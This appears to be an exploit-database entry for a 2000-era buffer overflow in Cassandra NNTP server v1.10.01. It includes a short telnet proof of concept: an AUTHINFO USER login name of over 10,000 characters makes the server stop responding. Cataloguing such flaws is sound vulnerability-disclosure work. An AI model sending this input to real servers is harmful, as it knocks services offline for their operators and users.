header-logo
Suggest Exploit
vendor:
NNTP Server
by:
SecurityFocus
7.5
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: NNTP Server
Affected Version From: v1.10.01
Affected Version To: v1.10.01
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 95
2000

Unchecked Buffer in Cassandra NNTP v1.10 Server

A buffer overflow vulnerability exists in the code that handles login information in Cassandra NNTP v1.10 server. Entering a login name that consists of over 10 000 characters will cause the server to stop responding until the administrator restarts the application.

Mitigation:

Ensure that the login name is not longer than 10 000 characters.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/1156/info

Unchecked buffer exists in the code that handles login information in Cassandra NNTP v1.10 server. Entering a login name that consists of over 10 000 characters will cause the server to stop responding until the administrator restarts the application.

[host$ telnet target 119
Trying target...
Connected to target.
Escape character is '^]'.
200 CASSANDRA NNTP-Server (v1.10.01 Unregistered) for Windows 95 ready at Mon, 1
May 2000 xx:xx:xx +-300 (posting allowed) 

AUTHINFO USER <10 000 character string>


Where buffer is 10000 characters.

Navigation

Suggest Exploit

Services By CQR